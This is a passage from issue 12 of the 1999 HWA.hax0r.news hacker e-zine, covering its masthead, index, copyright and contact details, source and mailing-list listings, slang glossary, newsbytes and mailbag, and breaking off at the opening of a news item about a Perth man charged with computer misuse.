Copy Link
Add to Bookmark
Report

hwa-hn12

eZine's profile picture
Published in 
HWA
 · 5 years ago

    [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 12 Volume 1 1999 April 1st 99
==========================================================================


** ISSUE 13 will be back to standard text format, htmlizing this file is too
much work and bloats up the issue too much, if anyone wants to convert the
texts to html though feel free to do so, and credit yourself for the work
done as it takes some time to get all the links and make sure demo html is
viewable in online versions..... - Ed

010010 0101010101
01010101 0101010101010
010101 010101
010101 01010101
010101 01010101
010101 010101010
0010101010 01010100101010
0101010101 01010101010101


Note that some stuff may not display correctly as I did not fully convert
all the text contained in this file to html, it is recommended you read
this file in standard text mode...

=------------------------------------------------------------------------=

"If your hacker admits to having been wrong, don't demand an apology;
so far as the hacker is concerned, admitting to being wrong
is an apology,"


- from http://www.plethora.net/~seebs/faqs/hacker.html
see sideline, 'proper care and feeding of your hacker'

=------------------------------------------------------------------------=


Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>


@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ... #12

=-----------------------------------------------------------------------=


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #wierdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************


=-------------------------------------------------------------------------=

Issue #12


=--------------------------------------------------------------------------=


[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the editor..................................................
03.0 .. Aussie faces 12months jail time .................................
04.0 .. Mitnick update, another year in jail?............................
04.1 .. The Bumper Sticker Stays.........................................
04.2 .. Mitnick's Judgment Day at Hand...................................
04.3 .. Why We Still Have to Free Kevin Mitnick..........................
04.4 .. Mitnick gets 46 months...........................................
05.0 .. Sesquipedalian.c 0 length connection resetting exploit...........
06.0 .. Yet more MSIE5 vulnerabilities...................................
07.0 .. QuickHacks and tips from ManicX..................................
08.0 .. NT4 index server 2.0 vulnerabilities.............................
09.0 .. Yahoo news ticker has plaintext passwords in config files........
10.0 .. Defacing websites? read this from bufferoverflow/attrition.......
11.0 .. Security analysis of Satellite command uplinks...................
12.0 .. Melissa Pr0n virus makes it hard for Microsoft users.............
12.1 .. The Melissa macro virus code.....................................
12.2 .. PAPA, a Melissa variant targets specific people with ping fluds..
12.3 .. PAPA B and the MadCow variants of Melissa already spreading......
12.4 .. April 1st Melissa virus creator apprehended......................
13.0 .. [ISN] A hacker's worst nightmare ................................
13.1 .. How bad is Pentium III privacy threat?...........................
14.0 .. ICQ99 Bug, erh feature turns your icq into a DoSable web server..
15.0 .. Russian crackers takeout whitehouse.gov?.........................
16.0 .. New Excel macro virus can bypass protections.....................
17.0 .. xfree86 SUSE exploit.............................................
18.0 .. Proper feeding and caring of your new hacker ....................
19.0 .. Unix wardialer from w00w00 security..............................
20.0 .. Australia gears up security for Olympics ........................
21.0 .. NetBSD security advisories: umapfs ..............................
21.1 .. NetBSD noexec mount flag advisory ...............................
22.0 .. Checkpoint releases new DHCP based user 'mapping' technology.....
23.0 .. SPAWAR a navy site for the security conscious...go FISH..........
24.0 .. A Portscan detector..............................................
25.0 .. Port 21 (FTP) Control port vulnerability scanner.................
26.0 .. WuFTPd scanner...................................................
27.0 .. The Wu-FTPd exploit and patch thread ............................
28.0 .. Another Wu-FTPd exploit (wh0a.c).................................
29.0 .. Netscape 4.51 allows url sniffing exploit and patch.............
30.0 .. X11R6 rewt compromise exploit....................................
31.0 .. Yet another wu-ftpd scanner by 03m0s1s...........................
32.0 .. RedHat Linux security vulnerabilities list from redhat...........
33.0 .. The Suburbanization of Slashdot by Pasty Drone...................
34.0 .. Canada Rolls into Fiscal 2000....................................
35.0 .. More exploits from the ADM crew .................................
=--------------------------------------------------------------------------=

Special Sections. Civil disobedience and hacktivism, hacking contests

=--------------------------------------------------------------------------=

SP.00 .. Intro: That Wild Wild Cyberfrontier..............................
SP.01 .. Article 1:"Electronic Civil Disobedience and.....................
...........................the World Wide Web of Hacktivism:"
....
SP.02 .. Article 2:"Digital Zapatismo"....................................
.................................................................
SP.C1 .. The Phallusi of cracking contests................................
SP.C2 .. Hacker challenges: Boon or Bane by Gene Spafford.................

=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
..........................................................................
HA.HA .. Humour and puzzles ............................................
HOW.TO .. New section: "How to hack" by our illustrious editor part 3.....
SITE.1 .. Featured site, .................................................
RAW.1 .. We remember Autonet'86..........................................
H.W .. Hacked Websites ..............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99


00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD


Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]


00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy"
will do ... ;-) thanx.


Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5'' disks, Zip disks, 5.25'' or 8'' floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA


00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

HiR:Hackers Information Report... http://axon.jccc.net/hir/
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls (HNN)..................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD ..............................http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+........................http://www.gammaforce.org/
News site+........................http://www.projectgamma.com/


+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...

* Yes demoniz is now officially retired, if you go to that site though the
Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will
also be hosting a webboard as soon as that site comes online perhaps you can
visit it and check us out if I can get some decent wwwboard code running I
don't really want to write my own, another alternative being considered is a
telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=cracker
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.


http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://www.l0pht.com/cyberul.html
http://www.hackernews.com/archive.html?122998.html
http://ech0.cjb.net ech0 Security
http://net-security.org Net Security

...


Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.


- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html


THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;

http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html


About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.

Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)


Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.


CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:

Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

ISSN 1004-042X

Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest


[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed


Subscribe: mail majordomo@repsec.com with "subscribe isn".


@HWA


00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black


Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ATTENTION: All foreign correspondants please check in or be removed by next
issue I need your current emails since contact info was recently lost in a
HD mishap and i'm not carrying any deadweight. Plus we need more people sending
in info, my apologies for not getting back to you if you sent in January I lost
it, please resend.


N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site


*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************

:-p


1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...


@HWA


00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff


@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:

Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.

@HWA - see EoA ;-)

!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)

AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??

*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's

CCC - Chaos Computer Club (Germany)

*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC - End of Commentary

EoA - End of Article or more commonly @HWA

EoF - End of file

EoD - End of diatribe (AOL'ers: look it up)

FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)

du0d - a small furry animal that scurries over keyboards causing people to type
wierd crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.

*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R

*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'

2 - A tool for cutting sheet metal.

HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&

HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI- Missing on/from IRC

NFC - Depends on context: No Further Comment or No Fucking Comment

NFR - Network Flight Recorder (Do a websearch) see 0wn3d

NFW - No fuckin'way

*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes

PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare

Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
CT - Cyber Terrorism

*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d

*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.

TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA - To Be Arranged/To Be Announced also 2ba

TFS - Tough fucking shit.

*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>

2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf - what the fuck

*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.

@HWA


-=- :. .: -=-


01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.


* all the people who sent in cool emails and support

FProphet Pyra Pasty Drone
TwstdPair TheDuece _NeM_
D----Y RTFM99 Kevin Mitnick (watch yer back)
ypwitch kimmie vexxation
hunchback mack sAs72 Spikeman

and the #innerpulse, #hns crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)


kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/

@HWA


01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't
always popular..."

- FProphet '99


+++ When was the last time you backed up your important data?

++ Y2K: Qantas prepared to cancel flights

The Y2K problem has proven too much for Australian airline Qantas, which
has announced it may have to cancel flights. In a statement to the
Australian Stock Exchange (ASX), the airline said it may reduce the
number of flights on some domestic and international routes. "Qantas will only
flyf it is safe to do so,"
its report stated. Qantas said it had checked
with the manufacturers of its aircraft, which advised "that there are no
safety or airworthiness issues relating to the year 2000 compliance of their
aircraft"
. On this basis, the airline said it was satisfied that its
business was "unlikely to be significantly disrupted". However, Qantas
said services provided by "certain airports and air space authorities" were
not compliant, and for this reason contingency plans were being developed.


Want the full story? It's at
<a href="http://newswire.com.au/9903/qy2k.htm">http://newswire.com.au/9903/qy2k.htm</a>

++ School Net filter software bans Bible

A Net filtering system used by NSW state schools has been found to
inaccurately block certain Web sites, according to online civil
liberties group Electronic Frontiers Australia (EFA). Citing a recent report by
the US body Censorware Project, EFA said the SmartFilter product used by
schools had "problems". The report 'Censored Internet Access in Utah
Public Schools and Libraries' found SmartFilter blocked sites featuring all of
Shakespeare's plays, the Koran, the 'Adventures of Sherlock Holmes' and
a number of safe-sex and AIDS prevention sites, to name just a few. Danny
Yee of EFA said SmartFilter's claim that all blocked sites were checked by
people was false.


<a href="http://newswire.com.au/9903/netfilt.htm">http://newswire.com.au/9903/netfilt.htm</a>


++ AOL and Sun to ship in early 2000

AOL and Sun executives have revealed plans for their first jointly
developed products. The products, to be shipped early next year, will be
available for most major platforms including Linux and Windows NT, and
will be sold through a dedicated sales force of more than 500 people. AOL and
Sun have also announced they will continue to maintain support for their
existing software lines. Details are still unclear about how Sun and
AOL/Netscape will develop a multiplatform ecommerce solution, and what
form the product will take.


<a href="http://newswire.com.au/9903/aosun.htm">http://newswire.com.au/9903/aosun.htm</a>


++ AMAZON TO DO AUCTIONS (BUS. 7:40 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/18788.html

The book and music seller plans to take on eBay, OnSale....
Also: A green energy company goes online, announces IPO....
Disney's Blast rejoins the family.... China likes CDMA....
Covad extends DSL nationwide for small businesses.... And
ZiaSun says it will take Web-based email everywhere
and anywhere.


++ WHEN SECRECY STOPS SCIENCE (TECH. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/technology/story/18740.html

Yes, it's bad to share the recipe for a really big bomb. But
scientific secrecy can go too far. An MIT colloquium tries
to strike a balance. By Chris Oakes.
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .


++ STATES SEEK OS SURRENDER (POL. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/politics/story/18781.html

Nineteen states that have accused Microsoft of antitrust
violations want to force the company to auction off its
Windows operating system. There's still no hint of what the
feds want.


Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yes we really do get a pile of mail in case you were wondering ;-0
heres a sampling of some of the mail we get here, the more interesting
ones are included and of course we had to get in the plugs for the
zine coz we love to receive those too *G* - Ed

Delivered-To: dok-cruciphux@dok.org
From: "liquid phire" <liquidphire@hotmail.com>
Subject: the unknown netizen
Date: Thu, 25 Mar 1999 15:15:34 PST


the unknown netizen


we are not all sinless, our ethics do not save us from damnation. we are
close to gods, but our divinity is tainted with blood. we are not
perfect and our mistakes do not go unnoticed.


but we are one.


it is not one cry that sends a shiver up the spine of every government
with something to hide, it is the shouts of a thousand warriors. it is
not a few that are imprisioned, it is us all that wear chains. it is not
one tear that is shed, it is an ocean of sorrow that drowns everything
in it's wake.


we are of one mind and we never forget. we are of one body, intertwined
electricity, wires and chips. we have but one vision, a world in which
rights need not be fought for.


as one we fight.


as one we will see a new world.


as one we are the faceless, the names that will never be lost to time.


phiregod
liquidphire@hotmail.com
please exsuse all errors in grammer/spelling.
Get Your Private, Free Email at http://www.hotmail.com


-=-

-=-

Delivered-To: dok-cruciphux@dok.org
From: "John Doe" <XXXXXXXXXXXXXXXXXX>
To: cruciphux@dok.org
Subject: Book
Date: Sat, 27 Mar 1999 05:46:08 PST
Mime-Version: 1.0
Content-type: text/plain


Dear Editor,


I am currently in the process of writing a book looking at the dawn of
hacking through to where it is now and on to the future. This book will
not be containing any comments designed to inflame the current public
perception of hackers, it has been designed to shatter the myths. To do
this though, I am in need of some help. I need people to point me in
the right direction. I shall also be entering comments from a few
hackers if they will let me.


One chapter in the book seems to have gotten the interest of a lot of
hackers. This chapter is about profiles of hackers. Basically, I write
out these profiles without their nicks, names or anything to identify
them and show what a 'typical hacker' is if there indeed is one.


If you could help me out by putting an article in your net magazine
requesting aid for me or by talking to other hackers that are more
'leet' than others so that I can get their opinions. So far, I have
spoken to very little people and their talents seem to be more in their
head than actually physically used.


Any help would be greatly appreciated.


Your Sincerely


XXXXXXXXXXXX
Get Your Private, Free Email at http://www.hotmail.com

Send responses to this to me directly for forwarding to the writer
cruciphux@dok.org
thankyou.

================================================================

@HWA


02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>
#include <thoughts.h>
#include <backup.h>

main()
{
printf ("Read commented source!\n\n");

/*well i tried out an idea with html and it doesn't agree with me
*too much double text is created and its a damn load more work to
*put together an issue that is html and text readable so we'll be
*sticking to text for now.
*
*Perhaps someone will volunteer time to convert an issue or two to
*html or sometime in the future when I have more spare time I may
*be able to make html versions, meanwhile ... have fun ... - Cruci
*
*/

printf ("EoF.\n");
}


Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.


@HWA

03.0 Aussie man faces 12 months in jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Perth 'passwords' man appears in court
Roulla Yiacoumi

A Perth man charged with 37 counts of unlawfully operating a
computer system has appeared in court.

Christopher Thomas Daniels, 20, did not enter a plea and
requested legal advice before his next appearance on April 13.

It was alleged Daniels had passwords to 350 Internet
accounts, but used just 37 to fraudulently gain $50 worth of
Net access (see story). It is believed he was given the account
details by a juvenile.

Users were not aware their accounts had been compromised;
